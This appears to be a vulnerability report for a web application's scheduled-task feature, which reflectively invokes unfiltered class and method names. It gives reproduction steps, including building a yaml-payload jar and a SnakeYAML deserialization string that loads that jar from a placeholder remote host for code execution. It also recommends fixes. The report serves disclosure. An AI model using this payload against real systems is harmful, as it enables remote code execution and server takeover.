[vulnerability] Remote Code Execute #13
Description
1. Steps to reproduce
Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows
Building and package, moveyaml-payload.jar into the root directory of the web service
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .When using the Scheduled Tasks feature, the call string will always contain symbols such as brackets and quotes, however, the XSSFilter in the program will convert these symbols to other characters, making the Scheduled Tasks feature completely unusable. So we need to whitelist the XSSFilter in application.yml for routes related to the scheduled tasks
A new scheduled task is created as follows
调用目标字符串 field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')
Execute this task after submission to remotely execute arbitrarily code
2. Expected behavior
The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class
3. Actual behavior
However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed
4. Affected Version
v2
5. Fixes Recommendations
- Filter dangerous class names
- Filter unnecessary protocols such as http, rmi, etc.